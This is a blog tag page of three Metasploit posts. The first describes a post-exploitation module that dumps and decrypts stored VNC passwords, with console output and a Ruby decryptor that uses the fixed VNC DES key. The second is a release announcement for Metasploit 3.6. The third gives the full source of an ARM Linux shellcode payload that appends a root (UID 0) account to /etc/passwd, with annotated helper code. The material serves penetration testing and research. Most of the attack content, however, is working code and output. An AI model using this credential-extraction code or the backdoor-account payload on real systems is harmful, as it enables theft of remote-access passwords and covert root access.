17 posts tagged 'metasploit'

  1. 2011.03.21 Metasploit VNC Password Extraction
  2. 2011.03.08 Metasploit Framework 3.6.0 Released!
  3. 2010.12.09 Create a New User with UID 0 - ARM (Meta)
2011. 3. 21. 19:36

Metasploit VNC Password Extraction

Chris Gates wrote a blog post about the 'getvncpw' meterpreter script. I ran into the same issue on penetration tests in the past but didn't know much about the whacked-out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack, I wanted to find another way, but didn't get a chance to.

Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: "That's definitely within my coding ability to contribute a patch for." After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday, it went far beyond just adding in a bit of code to support UltraVNC.

changelog:

  • Complete rewrite as a post module instead of a meterpreter script
  • Passwords of fewer than 8 characters are correctly padded (thanks jduck)
  • UltraVNC checks added
  • TightVNC checks added for both VNC and its control console
  • Made it very simple to add new checks in either the registry or in a file
  • Output is a bit more verbose (lets you know something is happening)
  • Reports authentication credentials found to the database
  • Identifies the port that VNC is running on as well

It isn't in the Metasploit trunk, so until/if it gets added you can get it here:

http://www.room362.com/scripts-and-programs/metasploit/enum_vnc_pw.rb

If you have a check to add, find that it breaks for one reason or another, or just want to tell me that I suck, please leave a comment or email me.

Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways):


msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: XPBASELINE\Administrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw 
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options

Module options (post/windows/gather/enum_vnc_pw):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf post(enum_vnc_pw) > run

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
[*] Post module execution completed

msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/enum_vnc_pw 

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter > 
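The decryption step the module performs, written out as an added example (this is not Mubix's enum_vnc_pw code and not taken from room362.com). VNC servers store the password DES-encrypted under one fixed eight-byte key, and the d3des implementation they use reads key bytes bit-reversed compared with standard DES, so the key has to be mirrored (0x17526b06234e5807 becomes 0xe84ad660c4721ae0) before a stock library reproduces the result. Passwords are cut to eight characters and NUL-padded to a full block, which is the short-password padding the changelog mentions. Two details are my own choices: DES-EDE3 with the key repeated three times is used in place of single DES (identical output, but single DES sits in OpenSSL 3's legacy provider and is not loaded by default), and the ninth byte of the UltraVNC values in the run above is treated as a trailer rather than ciphertext. The hex strings fed in are the ones from the run above.

```ruby
require 'openssl'

# Fixed key vncpasswd feeds to d3des when it obfuscates a stored password.
VNC_FIXED_KEY = [0x17, 0x52, 0x6b, 0x06, 0x23, 0x4e, 0x58, 0x07].freeze

# d3des consumes key bytes bit-reversed compared with FIPS DES, so mirror
# each byte before handing the key to OpenSSL (0x17 -> 0xe8, 0x52 -> 0x4a, ...).
def reverse_bits(byte)
  byte.to_s(2).rjust(8, '0').reverse.to_i(2)
end

# 24-byte key for DES-EDE3: with K1 = K2 = K3 triple DES collapses to single DES.
# Used instead of 'des-ecb' because single DES lives in OpenSSL 3's legacy
# provider and is unavailable by default, while 3DES is still in the default one.
def openssl_vnc_key
  VNC_FIXED_KEY.map { |b| reverse_bits(b) }.pack('C*') * 3
end

# One 8-byte ECB block; padding is disabled because VNC never pads past the block.
def des_block(data, mode)
  cipher = OpenSSL::Cipher.new('des-ede3')
  mode == :decrypt ? cipher.decrypt : cipher.encrypt
  cipher.key = openssl_vnc_key
  cipher.padding = 0
  cipher.update(data) + cipher.final
end

# The registry values the module checks (WinVNC3/WinVNC4/RealVNC/TightVNC) hold
# exactly 8 bytes. UltraVNC's ultravnc.ini value is 9 bytes; only the first 8
# are ciphertext (assumption: the 9th is a trailer, which is why it differs
# between the two UltraVNC lines in the run above). Trailing NULs are the
# padding of a password shorter than 8 characters.
def decrypt_vnc_password(hex)
  raw = [hex.delete(" \n")].pack('H*')
  raise ArgumentError, "expected at least 8 bytes, got #{raw.bytesize}" if raw.bytesize < 8
  des_block(raw[0, 8], :decrypt).delete("\0")
end

# Reverse direction, as a server stores it: truncate to 8 characters and
# NUL-pad to a full block, so "111" is encrypted as "111\0\0\0\0\0".
def encrypt_vnc_password(password)
  des_block([password[0, 8]].pack('a8'), :encrypt).unpack1('H*')
end

if __FILE__ == $0
  %w[A85B4C5976979DE93B DE2C1BA7393F6708B3 c777b2de337a91cf].each do |h|
    puts "#{h} => #{decrypt_vnc_password(h)}"
  end
end
```

The same key and block mode are what the often-quoted one-liner `openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d` relies on; with a zero IV and a single block, CBC and ECB give the same answer.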


Source: http://www.room362.com/

2011. 3. 8. 14:43

Metasploit Framework 3.6.0 Released!


In coordination with Metasploit Express and Metasploit Pro, version 3.6 of the Metasploit Framework is now available. Hot on the heels of 3.5.2, this release comes with 8 new exploits and 12 new auxiliaries. A whopping 10 of those new auxiliary modules are Chris John Riley's foray into SAP, giving you the ability to extract a range of information from servers' management consoles via the SOAP interface. This release fixes an annoying installer bug on Linux where Postgres would not automatically start on reboot.

The feature I am most excited about is the new Post Exploitation support. I hinted at this new module type in the 3.5.2 release announcement and with 3.6, more than 20 new modules are available. Post modules are a new, more powerful replacement for meterpreter scripts. Scripts were clearly tied to a single platform: meterpreter for Windows. With modules it is much easier to abstract common tasks into libraries for any platform that can expose a session. For example, file operations are common across all platforms -- windows/meterpreter, windows/shell, linux/shell, etc. Post modules can simply include Post::File and have access to platform-agnostic methods for interacting with the file system. In the near future, this sort of abstraction will be extended to Windows registry manipulation and service control.

Too much generality can make it difficult to access OS-level features, and when you really need to get down and dirty with a session, you still can. Post modules have a Session object exactly as meterpreter scripts did, and you can still access all of the low-level methods available to it. That means you can use railgun for performing complex system manipulation (e.g. smartlocker) when necessary. A major benefit of Post modules is the ability to easily include other mixins from the framework. From a user's perspective, this means more consistent reporting and option handling than are currently available with scripts. This also opens the door to local exploits for a variety of platforms, including Windows, Linux, and even Cisco IOS through SSH and Telnet sessions.

Although post modules are meant to replace meterpreter scripts, scripts are not going away any time soon. We understand that many users still rely on private scripts for their post-exploitation needs and porting all of them to the new format will take time. So while we will be favoring module contributions over scripts, that doesn't mean your private code is suddenly going to stop working.

This is an exciting release. As always, it is immediately available from the Metasploit Framework downloads page.

Download: http://www.metasploit.com/framework/download/

2010. 12. 9. 18:41

Create a New User with UID 0 - ARM (Meta)

# Exploit Title: Linux/ARM - Create a new user with UID 0 (MSF)
# Date: 2010-11-25
# Author: Jonathan Salwan - twitter @shell_storm
# Tested on: ARM926EJ-S rev 5 (v5l)
# Issue link: https://metasploit.com/redmine/issues/3254

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

###
#
# AddUser
# -------
#
# Adds a UID 0 user to /etc/passwd.
#
###
module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Linux

  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'Linux Add User',
      'Version'     => '???',
      'Description' => 'Create a new user with UID 0',
      'Author'      => [ 'Jonathan Salwan' ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_ARMLE,
      'Privileged'  => true))

    # Register adduser options
    register_options(
      [
        OptString.new('USER',  [ true,  "The username to create",     "metasploit" ]),
        OptString.new('PASS',  [ true,  "The password for this user", "metasploit" ]),
        OptString.new('SHELL', [ false, "The shell for this user",    "/bin/sh" ]),
      ], self.class)
  end

  #
  # Dynamically builds the adduser payload based on the user's options.
  #
  def generate_stage
    user  = datastore['USER']  || 'metasploit'
    pass  = datastore['PASS']  || 'metasploit'
    shell = datastore['SHELL'] || '/bin/sh'

    # passwd(5) entry appended to /etc/passwd: UID 0, GID 0, home "/",
    # password hashed with traditional crypt(3) and the fixed salt 'Az'
    str   = "#{user}:#{pass.crypt('Az')}:0:0::/:#{shell}\n"
    # Single-byte immediates patched into the Thumb code below: pc-relative
    # distance to the "/etc/passwd" string (entry length + 52) and the byte
    # count handed to write(2). pack('C') keeps only the low byte, so the
    # entry must stay at or below 203 bytes.
    strl1 = [ (str.length)+52 ].pack('C*')
    strl2 = [ str.length ].pack('C*')
    pwdir = "/etc/passwd"

    payload =
      "\x05\x50\x45\xe0\x01\x50\x8f\xe2\x15\xff\x2f\xe1" +  # sub r5,r5,r5 ; add r5,pc,#1 ; bx r5 (switch to Thumb)
      "\x78\x46" + strl1 + "\x30" +                          # mov r0,pc ; adds r0,#(len+52) -> r0 = &"/etc/passwd"
      "\xff\x21\xff\x31\xff\x31\xff\x31\x45\x31" +           # r1 = 0x441 (O_WRONLY|O_CREAT|O_APPEND)
      "\xdc\x22\xc8\x32" +                                   # r2 = 0x1a4 (mode 0644)
      "\x05\x27\x01\xdf" +                                   # r7 = 5 ; svc -> open()
      "\x80\x46\x41\x46\x08\x1c" +                           # r8 = fd ; r0 = fd
      "\x79\x46\x18\x31\xc0\x46" +                           # r1 = pc+0x18 -> &entry ; nop
      strl2 + "\x22" +                                       # movs r2,#len
      "\x04\x27\x01\xdf" +                                   # r7 = 4 ; svc -> write()
      "\x41\x46\x08\x1c\x06\x27\x01\xdf" +                   # r0 = fd ; r7 = 6 ; svc -> close()
      "\x1a\x49\x08\x1c\x01\x27\x01\xdf" +                   # r7 = 1 ; svc -> exit() (status loaded pc-relative)
      str + pwdir                                            # entry, then the path (not NUL-terminated here)
  end

end
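The data-layout rules the module above depends on, as an added example in plain Ruby that runs without Metasploit (this is not part of Salwan's payload). The passwd entry and the two length bytes are built exactly as generate_stage builds them; what I add is the check that both lengths fit the 8-bit Thumb immediates the shellcode patches them into (pack('C') silently keeps only the low byte, so an over-long USER or SHELL would yield a corrupt pointer and byte count), and a check that USER and SHELL contain no ':' or newline, which would otherwise inject extra fields or a second entry. The hash is passed in precomputed so the example does not depend on the host's crypt(3) still supporting DES hashes; crypt_password shows the original call.

```ruby
# Path the shellcode opens; it follows the passwd entry in the payload body.
PASSWD_PATH = '/etc/passwd'

# Both lengths end up as 8-bit Thumb immediates:
#   adds r0, #(len + 52)  -> pc-relative pointer to PASSWD_PATH after the entry
#   movs r2, #len         -> byte count for write(2)
# [n].pack('C') keeps only the low byte, so anything over 255 corrupts the
# payload silently instead of failing.
THUMB_IMM_MAX   = 255
PATH_PTR_OFFSET = 52
MAX_ENTRY_BYTES = THUMB_IMM_MAX - PATH_PTR_OFFSET  # 203

# passwd(5) line exactly as generate_stage formats it: UID 0, GID 0, home "/".
# A ':' or newline in USER/SHELL would smuggle extra fields or a second entry
# into /etc/passwd, so reject them (check added here, not in the original).
def passwd_entry(user, pass_hash, shell = '/bin/sh')
  [user, shell].each do |field|
    raise ArgumentError, "#{field.inspect} may not contain ':' or newline" if field.match?(/[:\n]/)
  end
  "#{user}:#{pass_hash}:0:0::/:#{shell}\n"
end

# Traditional DES crypt(3) with the payload's fixed salt 'Az'. Kept in its own
# method because libxcrypt builds without DES support make String#crypt raise.
def crypt_password(pass)
  pass.crypt('Az')
end

# The two single-byte immediates, in generate_stage's order (strl1, strl2).
def length_immediates(entry)
  len = entry.bytesize
  if len > MAX_ENTRY_BYTES
    raise ArgumentError, "entry is #{len} bytes, limit is #{MAX_ENTRY_BYTES}; shorten USER or SHELL"
  end
  [[len + PATH_PTR_OFFSET].pack('C'), [len].pack('C')]
end

# Everything the shellcode needs apart from its fixed instruction bytes.
def payload_data(user, pass_hash, shell = '/bin/sh')
  entry = passwd_entry(user, pass_hash, shell)
  strl1, strl2 = length_immediates(entry)
  { entry: entry, strl1: strl1, strl2: strl2, trailer: entry + PASSWD_PATH }
end
```

With the module's defaults the entry is 40 bytes, so strl1 is 0x5c and strl2 is 0x28; a 200-character user name pushes the entry past 203 bytes and is rejected here, whereas the original would wrap the immediates and write the wrong number of bytes to the wrong path.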
Source: Exploit-db
